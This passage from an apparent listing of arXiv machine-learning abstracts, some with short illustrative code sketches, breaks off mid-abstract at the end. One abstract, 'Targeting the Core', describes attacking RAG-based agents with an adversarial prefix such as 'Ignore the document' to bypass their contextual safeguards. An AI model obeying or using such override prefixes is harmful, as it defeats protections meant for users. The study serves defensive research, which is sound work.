PaintScene4D: Consistent 4D Scene Generation from Text Prompts
Recent advances in diffusion models have revolutionized 2D and 3D content creation, yet generating photorealistic dynamic 4D scenes remains a significant challenge. Existing dynamic 4D generation methods typically rely on distilling knowledge from pre-trained 3D generative models, often fine-tuned on synthetic object datasets. Consequently, the resulting scenes tend to be object-centric and lack photorealism. While text-to-video models can generate more realistic scenes with motion, they often struggle with spatial understanding and provide limited control over camera viewpoints during rendering. To address these limitations, we present PaintScene4D, a novel text-to-4D scene generation framework that departs from conventional multi-view generative models in favor of a streamlined architecture that harnesses video generative models trained on diverse real-world datasets. Our method first generates a reference video using a video generation model, and then employs a strategic camera array selection for rendering. We apply a progressive warping and inpainting technique to ensure both spatial and temporal consistency across multiple viewpoints. Finally, we optimize multi-view images using a dynamic renderer, enabling flexible camera control based on user preferences. Adopting a training-free architecture, our PaintScene4D efficiently produces realistic 4D scenes that can be viewed from arbitrary trajectories. The code will be made publicly available. Our project page is at https://paintscene4d.github.io/
Updated: 2024-12-05 18:59:57
Categories: cs.CV,cs.AI
QUEEN: QUantized Efficient ENcoding of Dynamic Gaussians for Streaming Free-viewpoint Videos
Online free-viewpoint video (FVV) streaming is a challenging and relatively under-explored problem. It requires incremental on-the-fly updates to a volumetric representation, fast training and rendering to satisfy real-time constraints, and a small memory footprint for efficient transmission. If achieved, it can enhance user experience by enabling novel applications, e.g., 3D video conferencing and live volumetric video broadcast, among others. In this work, we propose a novel framework for QUantized and Efficient ENcoding (QUEEN) for streaming FVV using 3D Gaussian Splatting (3D-GS). QUEEN directly learns Gaussian attribute residuals between consecutive frames at each time-step without imposing any structural constraints on them, allowing for high quality reconstruction and generalizability. To efficiently store the residuals, we further propose a quantization-sparsity framework, which contains a learned latent-decoder for effectively quantizing attribute residuals other than Gaussian positions and a learned gating module to sparsify position residuals. We propose to use the Gaussian viewspace gradient difference vector as a signal to separate the static and dynamic content of the scene. It acts as a guide for effective sparsity learning and speeds up training. On diverse FVV benchmarks, QUEEN outperforms the state-of-the-art online FVV methods on all metrics. Notably, for several highly dynamic scenes, it reduces the model size to just 0.7 MB per frame while training in under 5 sec and rendering at 350 FPS. Project website is at https://research.nvidia.com/labs/amri/projects/queen
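As a concrete illustration of the per-frame residual update described above, here is a minimal sketch in which a learned decoder produces attribute residuals from quantized latents and a gating module sparsifies position residuals; all module names, shapes, and the hard threshold are illustrative assumptions, not the released implementation.

```python
import torch

def update_gaussians(positions, attributes, pos_residual, attr_latent,
                     latent_decoder, gate_module):
    """One QUEEN-style time-step update (illustrative sketch).

    positions:    (N, 3) Gaussian centers from the previous frame
    attributes:   (N, D) non-position attributes (scale, rotation, color, ...)
    pos_residual: (N, 3) learned raw position residuals
    attr_latent:  (N, K) learned latent codes for attribute residuals
    """
    attr_residual = latent_decoder(attr_latent)        # decode quantized latents
    # Hard gate keeps position residuals only for dynamic content; training
    # would use a differentiable relaxation instead of this threshold.
    gate = (gate_module(pos_residual) > 0.5).float()   # (N, 1) in {0, 1}
    return positions + gate * pos_residual, attributes + attr_residual

# Toy usage with small stand-in networks for the learned modules.
N, D, K = 1024, 8, 8
decoder = torch.nn.Linear(K, D)
gate_net = torch.nn.Sequential(torch.nn.Linear(3, 1), torch.nn.Sigmoid())
new_pos, new_attr = update_gaussians(torch.randn(N, 3), torch.randn(N, D),
                                     torch.randn(N, 3), torch.randn(N, K),
                                     decoder, gate_net)
```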
Updated: 2024-12-05 18:59:55
Categories: cs.CV,cs.AI
VisionZip: Longer is Better but Not Necessary in Vision Language Models
Recent advancements in vision-language models have enhanced performance by increasing the length of visual tokens, making them much longer than text tokens and significantly raising computational costs. However, we observe that the visual tokens generated by popular vision encoders, such as CLIP and SigLIP, contain significant redundancy. To address this, we introduce VisionZip, a simple yet effective method that selects a set of informative tokens for input to the language model, reducing visual token redundancy and improving efficiency while maintaining model performance. The proposed VisionZip can be widely applied to image and video understanding tasks and is well-suited for multi-turn dialogues in real-world scenarios, where previous methods tend to underperform. Experimental results show that VisionZip outperforms the previous state-of-the-art method by at least 5% performance gains across nearly all settings. Moreover, our method significantly enhances model inference speed, improving the prefilling time by 8x and enabling the LLaVA-Next 13B model to infer faster than the LLaVA-Next 7B model while achieving better results. Furthermore, we analyze the causes of this redundancy and encourage the community to focus on extracting better visual features rather than merely increasing token length. Our code is available at https://github.com/dvlab-research/VisionZip .
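The token-reduction idea lends itself to a short sketch: keep the visual tokens that receive the most attention and merge the remainder into a few contextual tokens. The selection criterion and merge rule below (chunked averaging) are simplifying assumptions; the released code may differ.

```python
import torch

def visionzip_select(tokens, attn_cls, num_dominant=54, num_merged=10):
    """Keep the most-attended visual tokens and merge the remainder.

    tokens:   (N, D) visual tokens from the vision encoder
    attn_cls: (N,) attention each token receives (e.g., from the [CLS] token)
    Illustrative sketch; the released selection criteria may differ.
    """
    keep_mask = torch.zeros(tokens.size(0), dtype=torch.bool)
    keep_mask[attn_cls.topk(num_dominant).indices] = True
    dominant = tokens[keep_mask]
    rest = tokens[~keep_mask]
    # Merge leftover tokens into a few contextual tokens (chunked averaging
    # stands in for similarity-based grouping, for brevity).
    merged = torch.stack([c.mean(dim=0) for c in rest.chunk(num_merged, dim=0)])
    return torch.cat([dominant, merged], dim=0)

compact = visionzip_select(torch.randn(576, 1024), torch.rand(576))
print(compact.shape)  # torch.Size([64, 1024])
```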
Updated: 2024-12-05 18:59:53
Categories: cs.CV,cs.AI,cs.CL,cs.LG
Code-as-Monitor: Constraint-aware Visual Programming for Reactive and Proactive Robotic Failure Detection
Automatic detection and prevention of open-set failures are crucial in closed-loop robotic systems. Recent studies often struggle to simultaneously identify unexpected failures reactively after they occur and prevent foreseeable ones proactively. To this end, we propose Code-as-Monitor (CaM), a novel paradigm leveraging the vision-language model (VLM) for both open-set reactive and proactive failure detection. The core of our method is to formulate both tasks as a unified set of spatio-temporal constraint satisfaction problems and use VLM-generated code to evaluate them for real-time monitoring. To enhance the accuracy and efficiency of monitoring, we further introduce constraint elements that abstract constraint-related entities or their parts into compact geometric elements. This approach offers greater generality, simplifies tracking, and facilitates constraint-aware visual programming by leveraging these elements as visual prompts. Experiments show that CaM achieves a 28.7% higher success rate and reduces execution time by 31.8% under severe disturbances compared to baselines across three simulators and a real-world setting. Moreover, CaM can be integrated with open-loop control policies to form closed-loop systems, enabling long-horizon tasks in cluttered scenes with dynamic environments.
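To make the "constraints as code" idea concrete, here is a hypothetical example of the kind of monitor code a VLM could emit over tracked geometric constraint elements; the element representation, constraint functions, and thresholds are invented for illustration.

```python
import numpy as np

# Hypothetical VLM-emitted monitor code: each constraint is a function over
# compact geometric "constraint elements" (points tracked per frame).
def constraint_gripper_above_cup(gripper_pt, cup_center, min_height=0.02):
    """Proactive check: gripper must stay above the cup rim before pouring."""
    return gripper_pt[2] - cup_center[2] >= min_height

def constraint_object_stable(traj, max_disp=0.005):
    """Reactive check: a placed object should stop moving (failure otherwise)."""
    return np.linalg.norm(traj[-1] - traj[0]) <= max_disp

# Real-time monitoring loop (sketch): evaluate all constraints each frame.
frames = [dict(gripper=np.array([0.1, 0.0, 0.30]),
               cup=np.array([0.1, 0.0, 0.25]),
               obj_traj=np.array([[0.2, 0.2, 0.0], [0.2, 0.2, 0.0]]))]
for f in frames:
    ok = (constraint_gripper_above_cup(f["gripper"], f["cup"])
          and constraint_object_stable(f["obj_traj"]))
    if not ok:
        print("failure detected -> trigger re-planning")
```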
Updated: 2024-12-05 18:58:27
Categories: cs.RO,cs.AI,cs.CV,cs.LG
EgoPlan-Bench2: A Benchmark for Multimodal Large Language Model Planning in Real-World Scenarios
Multimodal Large Language Models (MLLMs), leveraging the power of Large Language Models, have recently demonstrated superior multimodal understanding and reasoning abilities, heralding a new era for artificial general intelligence (AGI). However, achieving AGI necessitates more than just comprehension and reasoning. A crucial capability required is effective planning in diverse scenarios, which involves making reasonable decisions based on complex environments to solve real-world problems. Despite its importance, the planning abilities of current MLLMs in varied scenarios remain underexplored. In this paper, we introduce EgoPlan-Bench2, a rigorous and comprehensive benchmark designed to assess the planning capabilities of MLLMs across a wide range of real-world scenarios. EgoPlan-Bench2 encompasses everyday tasks spanning 4 major domains and 24 detailed scenarios, closely aligned with human daily life. EgoPlan-Bench2 is constructed through a semi-automatic process utilizing egocentric videos, complemented by manual verification. Grounded in a first-person perspective, it mirrors the way humans approach problem-solving in everyday life. We evaluate 21 competitive MLLMs and provide an in-depth analysis of their limitations, revealing that they face significant challenges in real-world planning. To further improve the planning proficiency of current MLLMs, we propose a training-free approach using multimodal Chain-of-Thought (CoT) prompting, investigating the effectiveness of various multimodal prompts in complex planning. Our approach enhances the performance of GPT-4V by 10.24 on EgoPlan-Bench2 without additional training. Our work not only sheds light on the current limitations of MLLMs in planning, but also provides insights for future enhancements in this critical area. We have made data and code available at https://qiulu66.github.io/egoplanbench2/.
Updated: 2024-12-05 18:57:23
Categories: cs.AI,cs.CV
Moto: Latent Motion Token as the Bridging Language for Robot Manipulation
Recent developments in Large Language Models pre-trained on extensive corpora have shown significant success in various natural language processing tasks with minimal fine-tuning. This success offers new promise for robotics, which has long been constrained by the high cost of action-labeled data. We ask: given the abundant video data containing interaction-related knowledge available as a rich "corpus", can a similar generative pre-training approach be effectively applied to enhance robot learning? The key challenge is to identify an effective representation for autoregressive pre-training that benefits robot manipulation tasks. Inspired by the way humans learn new skills through observing dynamic environments, we propose that effective robotic learning should emphasize motion-related knowledge, which is closely tied to low-level actions and is hardware-agnostic, facilitating the transfer of learned motions to actual robot actions. To this end, we introduce Moto, which converts video content into latent Motion Token sequences by a Latent Motion Tokenizer, learning a bridging "language" of motion from videos in an unsupervised manner. We pre-train Moto-GPT through motion token autoregression, enabling it to capture diverse visual motion knowledge. After pre-training, Moto-GPT demonstrates the promising ability to produce semantically interpretable motion tokens, predict plausible motion trajectories, and assess trajectory rationality through output likelihood. To transfer learned motion priors to real robot actions, we implement a co-fine-tuning strategy that seamlessly bridges latent motion token prediction and real robot control. Extensive experiments show that the fine-tuned Moto-GPT exhibits superior robustness and efficiency on robot manipulation benchmarks, underscoring its effectiveness in transferring knowledge from video data to downstream visual manipulation tasks.
Updated: 2024-12-05 18:57:04
Categories: cs.RO,cs.AI,cs.CL,cs.CV,cs.LG
A method to benchmark high-dimensional process drift detection
Process curves are multivariate finite time series data coming from manufacturing processes. This paper studies machine learning methods that detect drifts in process curve datasets. A theoretic framework to synthetically generate process curves in a controlled way is introduced in order to benchmark machine learning algorithms for process drift detection. An evaluation score, called the temporal area under the curve, is introduced, which quantifies how well machine learning models unveil curves belonging to drift segments. Finally, a benchmark study comparing popular machine learning approaches on synthetic data generated with the introduced framework is presented, showing that existing algorithms often struggle with datasets containing multiple drift segments.
Updated: 2024-12-05 18:56:04
Categories: stat.ML,cs.AI,cs.LG
Masked Autoencoders are PDE Learners
Neural solvers for partial differential equations (PDEs) have great potential to generate fast and accurate physics solutions, yet their practicality is currently limited by their generalizability. PDEs evolve over broad scales and exhibit diverse behaviors; predicting these phenomena will require learning representations across a wide variety of inputs which may encompass different coefficients, boundary conditions, resolutions, or even equations. As a step towards generalizable PDE modeling, we adapt masked pretraining for physics problems. Through self-supervised learning across PDEs, masked autoencoders can consolidate heterogeneous physics to learn rich latent representations. We show that learned representations can generalize to a limited set of unseen equations or parameters and are meaningful enough to regress PDE coefficients or classify PDE features. Furthermore, conditioning neural solvers on learned latent representations can improve time-stepping and super-resolution performance across a variety of coefficients, discretizations, or boundary conditions, as well as on certain unseen PDEs. We hope that masked pretraining can emerge as a unifying method across large, unlabeled, and heterogeneous datasets to learn latent physics at scale.
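A minimal sketch of masked pretraining on patchified PDE solution fields, assuming a tiny Transformer autoencoder: random patches are hidden behind a learned mask token and the loss is computed only on the masked patches. The architecture, shapes, and masking ratio are illustrative assumptions.

```python
import torch
import torch.nn as nn

class TinyMAE(nn.Module):
    """Masked autoencoder over patchified PDE fields (illustrative sketch)."""
    def __init__(self, patch_dim, width=64):
        super().__init__()
        self.embed = nn.Linear(patch_dim, width)
        self.mask_token = nn.Parameter(torch.zeros(width))
        self.mixer = nn.TransformerEncoder(
            nn.TransformerEncoderLayer(width, nhead=4, batch_first=True),
            num_layers=2)
        self.head = nn.Linear(width, patch_dim)

    def forward(self, patches, mask):
        z = self.embed(patches)
        # Hide masked patches from the model; it must infer them from context.
        z = torch.where(mask.unsqueeze(-1), self.mask_token.expand_as(z), z)
        return self.head(self.mixer(z))

B, P, D = 8, 64, 32                       # batch, patches per field, patch dim
model = TinyMAE(D)
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
patches = torch.randn(B, P, D)            # stand-in for solution-field patches
mask = torch.rand(B, P) < 0.75            # 75% masking ratio
loss = ((model(patches, mask) - patches)[mask]).pow(2).mean()
loss.backward()
opt.step()
```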
Updated: 2024-12-05 18:55:44
Categories: cs.LG
Grounding Descriptions in Images informs Zero-Shot Visual Recognition
Vision-language models (VLMs) like CLIP have been cherished for their ability to perform zero-shot visual recognition on open-vocabulary concepts. This is achieved by selecting the object category whose textual representation bears the highest similarity with the query image. While successful in some domains, this method struggles with identifying fine-grained entities as well as generalizing to unseen concepts that are not captured by the training distribution. Recent works attempt to mitigate these challenges by integrating category descriptions at test time, albeit yielding modest improvements. We attribute these limited gains to a fundamental misalignment between image and description representations, which is rooted in the pretraining structure of CLIP. In this paper, we propose GRAIN, a new pretraining strategy aimed at aligning representations at both fine and coarse levels simultaneously. Our approach learns to jointly ground textual descriptions in image regions along with aligning overarching captions with global image representations. To drive this pre-training, we leverage frozen Multimodal Large Language Models (MLLMs) to derive large-scale synthetic annotations. We demonstrate the enhanced zero-shot performance of our model compared to current state-of-the art methods across 11 diverse image classification datasets. Additionally, we introduce Products-2023, a newly curated, manually labeled dataset featuring novel concepts, and showcase our model's ability to recognize these concepts by benchmarking on it. Significant improvements achieved by our model on other downstream tasks like retrieval further highlight the superior quality of representations learned by our approach. Code available at https://github.com/shaunak27/grain-clip .
Updated: 2024-12-05 18:52:00
Categories: cs.CV,cs.LG
Marvel: Accelerating Safe Online Reinforcement Learning with Finetuned Offline Policy
The high costs and risks involved in extensive environment interactions hinder the practical application of current online safe reinforcement learning (RL) methods. While offline safe RL addresses this by learning policies from static datasets, the performance therein is usually limited due to reliance on data quality and challenges with out-of-distribution (OOD) actions. Inspired by recent successes in offline-to-online (O2O) RL, it is crucial to explore whether offline safe RL can be leveraged to facilitate faster and safer online policy learning, a direction that has yet to be fully investigated. To fill this gap, we first demonstrate that naively applying existing O2O algorithms from standard RL would not work well in the safe RL setting due to two unique challenges: erroneous Q-estimations, resulting from offline-online objective mismatch and offline cost sparsity, and Lagrangian mismatch, resulting from difficulties in aligning Lagrange multipliers between offline and online policies. To address these challenges, we introduce Marvel, a novel framework for O2O safe RL, comprising two key components that work in concert: Value Pre-Alignment to align the Q-functions with the underlying truth before online learning, and Adaptive PID Control to effectively adjust the Lagrange multipliers during online finetuning. Extensive experiments demonstrate that Marvel significantly outperforms existing baselines in both reward maximization and safety constraint satisfaction. By introducing the first policy-finetuning based framework for O2O safe RL, which is compatible with many offline and online safe RL methods, our work has the great potential to advance the field towards more efficient and practical safe RL solutions.
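The Adaptive PID Control component can be pictured with a standard PID update on the safety Lagrange multiplier, driving the measured episodic cost toward a budget; the gains, budget, and update rule below are assumptions in the spirit of PID Lagrangian methods, not the paper's exact controller.

```python
class PIDLagrangian:
    """PID controller for a safety Lagrange multiplier (illustrative sketch).

    Drives the expected episodic cost toward the budget d by adapting the
    multiplier: lambda = max(0, Kp*e + Ki*sum(e) + Kd*de), with e = J_c - d.
    """
    def __init__(self, kp=0.05, ki=0.0005, kd=0.1, budget=25.0):
        self.kp, self.ki, self.kd, self.budget = kp, ki, kd, budget
        self.integral, self.prev_error = 0.0, 0.0

    def update(self, episode_cost):
        error = episode_cost - self.budget
        self.integral = max(0.0, self.integral + error)  # anti-windup at zero
        derivative = error - self.prev_error
        self.prev_error = error
        return max(0.0, self.kp * error + self.ki * self.integral
                   + self.kd * derivative)

pid = PIDLagrangian()
for cost in [40.0, 35.0, 30.0, 26.0, 24.0]:   # measured safety costs per epoch
    lam = pid.update(cost)
    # The policy would then maximize: reward - lam * cost
    print(f"lambda = {lam:.3f}")
```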
Updated: 2024-12-05 18:51:18
Categories: cs.LG,cs.AI
CA-SSLR: Condition-Aware Self-Supervised Learning Representation for Generalized Speech Processing
We introduce Condition-Aware Self-Supervised Learning Representation (CA-SSLR), a generalist conditioning model broadly applicable to various speech-processing tasks. Compared to standard fine-tuning methods that optimize for downstream models, CA-SSLR integrates language and speaker embeddings from earlier layers, making the SSL model aware of the current language and speaker context. This approach reduces the reliance on input audio features while preserving the integrity of the base SSLR. CA-SSLR improves the model's capabilities and demonstrates its generality on unseen tasks with minimal task-specific tuning. Our method employs linear modulation to dynamically adjust internal representations, enabling fine-grained adaptability without significantly altering the original model behavior. Experiments show that CA-SSLR reduces the number of trainable parameters, mitigates overfitting, and excels in under-resourced and unseen tasks. Specifically, CA-SSLR achieves a 10% relative reduction in LID errors, a 37% improvement in ASR CER on the ML-SUPERB benchmark, and a 27% decrease in SV EER on VoxCeleb-1, demonstrating its effectiveness.
Updated: 2024-12-05 18:51:10
Categories: eess.AS,cs.CL,cs.LG,cs.SD
Florence-VL: Enhancing Vision-Language Models with Generative Vision Encoder and Depth-Breadth Fusion
We present Florence-VL, a new family of multimodal large language models (MLLMs) with enriched visual representations produced by Florence-2, a generative vision foundation model. Unlike the widely used CLIP-style vision transformer trained by contrastive learning, Florence-2 can capture different levels and aspects of visual features, which are more versatile to be adapted to diverse downstream tasks. We propose a novel feature-fusion architecture and an innovative training recipe that effectively integrates Florence-2's visual features into pretrained LLMs, such as Phi 3.5 and LLama 3. In particular, we propose "depth-breadth fusion (DBFusion)" to fuse the visual features extracted from different depths and under multiple prompts. Our model training is composed of end-to-end pretraining of the whole model followed by finetuning of the projection layer and the LLM, on a carefully designed recipe of diverse open-source datasets that include high-quality image captions and instruction-tuning pairs. Our quantitative analysis and visualization of Florence-VL's visual features show its advantages over popular vision encoders on vision-language alignment, where the enriched depth and breadth play important roles. Florence-VL achieves significant improvements over existing state-of-the-art MLLMs across various multi-modal and vision-centric benchmarks covering general VQA, perception, hallucination, OCR, Chart, knowledge-intensive understanding, etc. To facilitate future research, our models and the complete training recipe are open-sourced. https://github.com/JiuhaiChen/Florence-VL
Updated: 2024-12-05 18:50:39
Categories: cs.CV,cs.AI
SmallToLarge (S2L): Scalable Data Selection for Fine-tuning Large Language Models by Summarizing Training Trajectories of Small Models
Despite the effectiveness of data selection for large language models (LLMs) during pretraining and instruction fine-tuning phases, improving data efficiency in supervised fine-tuning (SFT) for specialized domains poses significant challenges due to the complexity of fine-tuning data. To bridge this gap, we introduce an effective and scalable data selection method for SFT, SmallToLarge (S2L), which leverages training trajectories from small models to guide the data selection for larger models. We demonstrate through extensive experiments that S2L significantly improves data efficiency in SFT for mathematical problem-solving, reducing the training data to just 11% of the original MathInstruct dataset (Yue et al., 2023) to match full dataset performance while outperforming state-of-the-art data selection algorithms by an average of 4.7% across 6 in- and out-domain evaluation datasets. Remarkably, selecting only 50K data for SFT, S2L achieves a 32.7% accuracy on the most challenging MATH (Hendrycks et al., 2021) benchmark, improving Phi-2 (Li et al., 2023b) by 16.6%. In clinical text summarization on the MIMIC-III dataset (Johnson et al., 2016), S2L again outperforms training on the full dataset using only 50% of the data. Notably, S2L can perform data selection using a reference model 40x smaller than the target model, proportionally reducing the cost of data selection.
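A hedged sketch of trajectory-based selection: cluster per-example loss trajectories recorded from the small reference model and sample evenly across clusters. The clustering algorithm and balanced-sampling rule are assumptions, not the paper's exact procedure.

```python
import numpy as np
from sklearn.cluster import KMeans

def s2l_select(loss_trajectories, budget, num_clusters=100, seed=0):
    """Select a fine-tuning subset from small-model training trajectories.

    loss_trajectories: (N, T) loss of each example at T checkpoints of a
    *small* reference model; examples with similar trajectories are assumed
    to be learned similarly by the larger target model.
    """
    rng = np.random.default_rng(seed)
    labels = KMeans(n_clusters=num_clusters, n_init=10,
                    random_state=seed).fit_predict(loss_trajectories)
    selected = []
    per_cluster = budget // num_clusters   # balanced sampling across clusters
    for c in range(num_clusters):
        members = np.flatnonzero(labels == c)
        take = min(per_cluster, len(members))
        selected.extend(rng.choice(members, size=take, replace=False))
    return np.array(selected)

subset = s2l_select(np.random.rand(10000, 8), budget=1000)
print(subset.shape)
```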
Updated: 2024-12-05 18:47:47
Categories: cs.CL,cs.AI,cs.LG
Negative Token Merging: Image-based Adversarial Feature Guidance
Text-based adversarial guidance using a negative prompt has emerged as a widely adopted approach to steer diffusion models away from producing undesired concepts. While useful, performing adversarial guidance using text alone can be insufficient to capture complex visual concepts or avoid specific visual elements like copyrighted characters. In this paper, for the first time we explore an alternate modality in this direction by performing adversarial guidance directly using visual features from a reference image or other images in a batch. We introduce negative token merging (NegToMe), a simple but effective training-free approach which performs adversarial guidance through images by selectively pushing apart matching visual features between reference and generated images during the reverse diffusion process. By simply adjusting the used reference, NegToMe enables a diverse range of applications. Notably, when using other images in same batch as reference, we find that NegToMe significantly enhances output diversity (e.g., racial, gender, visual) by guiding features of each image away from others. Similarly, when used w.r.t. copyrighted reference images, NegToMe reduces visual similarity to copyrighted content by 34.57%. NegToMe is simple to implement using just few-lines of code, uses only marginally higher (<4%) inference time and is compatible with different diffusion architectures, including those like Flux, which don't natively support the use of a negative prompt. Code is available at https://negtome.github.io
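The core push-apart step can be sketched in a few lines: match each generated token to its most similar reference token by cosine similarity, then linearly extrapolate away from the match. The matching and extrapolation details below are illustrative assumptions.

```python
import torch
import torch.nn.functional as F

def neg_tome(gen_tokens, ref_tokens, scale=1.1):
    """Push generated features away from matching reference features (sketch).

    gen_tokens: (N, D) tokens of the image being generated
    ref_tokens: (M, D) tokens of the reference image (or another batch image)
    scale > 1 linearly extrapolates each token away from its best match.
    """
    sim = F.normalize(gen_tokens, dim=-1) @ F.normalize(ref_tokens, dim=-1).T
    match = ref_tokens[sim.argmax(dim=-1)]   # closest reference token per token
    return match + scale * (gen_tokens - match)

guided = neg_tome(torch.randn(256, 768), torch.randn(256, 768))
print(guided.shape)  # torch.Size([256, 768])
```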
Updated: 2024-12-05 18:43:25
Categories: cs.CV,cs.AI,cs.GR,cs.LG,stat.ML
FedDUAL: A Dual-Strategy with Adaptive Loss and Dynamic Aggregation for Mitigating Data Heterogeneity in Federated Learning
Federated Learning (FL) marks a transformative approach to distributed model training by combining locally optimized models from various clients into a unified global model. While FL preserves data privacy by eliminating centralized storage, it encounters significant challenges such as performance degradation, slower convergence, and reduced robustness of the global model due to the heterogeneity in client data distributions. Among the various forms of data heterogeneity, label skew emerges as a particularly formidable and prevalent issue, especially in domains such as image classification. To address these challenges, we begin with comprehensive experiments to pinpoint the underlying issues in the FL training process. Based on our findings, we then introduce an innovative dual-strategy approach designed to effectively resolve these issues. First, we introduce an adaptive loss function for client-side training, meticulously crafted to preserve previously acquired knowledge while maintaining an optimal equilibrium between local optimization and global model coherence. Secondly, we develop a dynamic aggregation strategy for aggregating client models at the server. This approach adapts to each client's unique learning patterns, effectively addressing the challenges of diverse data across the network. Our comprehensive evaluation, conducted across three diverse real-world datasets, coupled with theoretical convergence guarantees, demonstrates the superior efficacy of our method compared to several established state-of-the-art approaches.
Updated: 2024-12-05 18:42:29
Categories: cs.LG,cs.AI,cs.CV,cs.DC
Targeting the Core: A Simple and Effective Method to Attack RAG-based Agents via Direct LLM Manipulation
AI agents, powered by large language models (LLMs), have transformed human-computer interactions by enabling seamless, natural, and context-aware communication. While these advancements offer immense utility, they also inherit and amplify inherent safety risks such as bias, fairness, hallucinations, privacy breaches, and a lack of transparency. This paper investigates a critical vulnerability: adversarial attacks targeting the LLM core within AI agents. Specifically, we test the hypothesis that a deceptively simple adversarial prefix, such as "Ignore the document", can compel LLMs to produce dangerous or unintended outputs by bypassing their contextual safeguards. Through experimentation, we demonstrate a high attack success rate (ASR), revealing the fragility of existing LLM defenses. These findings emphasize the urgent need for robust, multi-layered security measures tailored to mitigate vulnerabilities at the LLM level and within broader agent-based architectures.
Updated: 2024-12-05 18:38:30
Categories: cs.AI
WaveletGPT: Wavelets Meet Large Language Models
Large Language Models (LLMs) have ushered in a new wave of artificial intelligence advancements impacting every scientific field and discipline. They are trained on a simple objective: to predict the next token given the previous context. We live in a world where most of the data around us, e.g., text, audio, and music, has a multi-scale structure associated with it. This paper infuses LLMs with traditional signal processing ideas, namely wavelets, during pre-training to take advantage of the structure. Without adding any extra parameters to a GPT-style LLM architecture, we achieve the same pre-training performance almost twice as fast in text, raw audio, and symbolic music. This is achieved by imposing a structure on intermediate embeddings. When trained for the same number of training steps, we achieve significant gains in performance, which is comparable to pre-training a larger neural architecture. Our architecture allows every next token prediction access to intermediate embeddings at different temporal resolutions in every Transformer decoder block. This work will hopefully pave the way for incorporating multi-rate signal processing ideas into traditional LLM pre-training. Further, we showcase pushing model performance by improving internal structure instead of just going after scale.
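One way to picture the multi-scale structure on intermediate embeddings is a Haar-style causal moving average: different coordinate groups of each hidden state see the token sequence at different temporal resolutions. The grouping and kernel below are illustrative assumptions, not the paper's exact wavelet construction.

```python
import torch

def multiscale_embeddings(h, num_scales=3):
    """Give embedding coordinate groups different temporal resolutions (sketch).

    h: (B, T, D) intermediate Transformer activations. Coordinate group k is
    replaced by a causal moving average over 2**k past tokens (a Haar-style
    approximation), so deeper layers see the sequence at several scales.
    """
    B, T, D = h.shape
    out = h.clone()
    group = D // num_scales
    for k in range(1, num_scales):
        win = 2 ** k
        block = h[..., k * group:(k + 1) * group]
        # Causal cumulative-sum trick for a moving average of width `win`.
        csum = torch.cumsum(block, dim=1)
        lag = torch.cat([torch.zeros_like(csum[:, :win]), csum[:, :-win]], dim=1)
        counts = torch.arange(1, T + 1).clamp(max=win).view(1, T, 1)
        out[..., k * group:(k + 1) * group] = (csum - lag) / counts
    return out

x = torch.randn(2, 16, 96)
print(multiscale_embeddings(x).shape)  # torch.Size([2, 16, 96])
```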
Updated: 2024-12-05 18:35:26
Categories: eess.SP,cs.AI,cs.CL,cs.LG,cs.SD,eess.AS
Efficient Task Grouping Through Samplewise Optimisation Landscape Analysis
Shared training approaches, such as multi-task learning (MTL) and gradient-based meta-learning, are widely used in various machine learning applications, but they often suffer from negative transfer, leading to performance degradation in specific tasks. While several optimisation techniques have been developed to mitigate this issue for pre-selected task cohorts, identifying optimal task combinations for joint learning - known as task grouping - remains underexplored and computationally challenging due to the exponential growth in task combinations and the need for extensive training and evaluation cycles. This paper introduces an efficient task grouping framework designed to reduce these overwhelming computational demands of the existing methods. The proposed framework infers pairwise task similarities through a sample-wise optimisation landscape analysis, eliminating the need for the shared model training required to infer task similarities in existing methods. With task similarities acquired, a graph-based clustering algorithm is employed to pinpoint near-optimal task groups, providing an approximate yet efficient and effective solution to the originally NP-hard problem. Empirical assessments conducted on 8 different datasets highlight the effectiveness of the proposed framework, revealing a five-fold speed enhancement compared to previous state-of-the-art methods. Moreover, the framework consistently demonstrates comparable performance, confirming its remarkable efficiency and effectiveness in task grouping.
Updated: 2024-12-05 18:33:59
Categories: cs.LG
Stabilizing and Solving Inverse Problems using Data and Machine Learning
We consider an inverse problem involving the reconstruction of the solution to a nonlinear partial differential equation (PDE) with unknown boundary conditions. Instead of direct boundary data, we are provided with a large dataset of boundary observations for typical solutions (collective data) and a bulk measurement of a specific realization. To leverage this collective data, we first compress the boundary data using proper orthogonal decomposition (POD) in a linear expansion. Next, we identify a possible nonlinear low-dimensional structure in the expansion coefficients using an auto-encoder, which provides a parametrization of the dataset in a lower-dimensional latent space. We then train a neural network to map the latent variables representing the boundary data to the solution of the PDE. Finally, we solve the inverse problem by optimizing a data-fitting term over the latent space. We analyze the underlying stabilized finite element method in the linear setting and establish optimal error estimates in the $H^1$ and $L^2$-norms. The nonlinear problem is then studied numerically, demonstrating the effectiveness of our approach.
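The first stage of the pipeline, POD compression of the collective boundary data, reduces to a truncated SVD; the sketch below keeps enough modes to capture 99% of the energy. The dataset, sizes, and threshold are stand-ins.

```python
import numpy as np

# Stage 1: POD compression of collective boundary data (illustrative).
# Rows of G are boundary observations for typical solutions.
G = np.random.rand(5000, 200)                  # stand-in collective dataset
G_mean = G.mean(axis=0)
U, S, Vt = np.linalg.svd(G - G_mean, full_matrices=False)
r = np.searchsorted(np.cumsum(S**2) / np.sum(S**2), 0.99) + 1
basis = Vt[:r]                                 # first r POD modes
coeffs = (G - G_mean) @ basis.T                # expansion coefficients, (N, r)

# Stages 2-4 (autoencoder on `coeffs`, a network mapping latents to PDE
# solutions, latent-space optimization of a data-fitting term) would follow;
# the POD step above is the part the abstract specifies concretely.
print(f"kept {r} of {len(S)} modes")
```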
Updated: 2024-12-05 18:31:14
Categories: math.NA,cs.LG,cs.NA
Providing Differential Privacy for Federated Learning Over Wireless: A Cross-layer Framework
Federated Learning (FL) is a distributed machine learning framework that inherently allows edge devices to maintain their local training data, thus providing some level of privacy. However, FL's model updates still pose a risk of privacy leakage, which must be mitigated. Over-the-air FL (OTA-FL) is an adapted FL design for wireless edge networks that leverages the natural superposition property of the wireless medium. We propose a wireless physical layer (PHY) design for OTA-FL which improves differential privacy (DP) through a decentralized, dynamic power control that utilizes both inherent Gaussian noise in the wireless channel and a cooperative jammer (CJ) for additional artificial noise generation when higher privacy levels are required. Although primarily implemented within the Upcycled-FL framework, where a resource-efficient method with first-order approximations is used at every even iteration to decrease the required information from clients, our power control strategy is applicable to any FL framework, including FedAvg and FedProx as shown in the paper. This adaptation showcases the flexibility and effectiveness of our design across different learning algorithms while maintaining a strong emphasis on privacy. Our design removes the need for client-side artificial noise injection for DP, utilizing a cooperative jammer to enhance privacy without affecting transmission efficiency for higher privacy demands. Privacy analysis is provided using the Moments Accountant method. We perform a convergence analysis for non-convex objectives 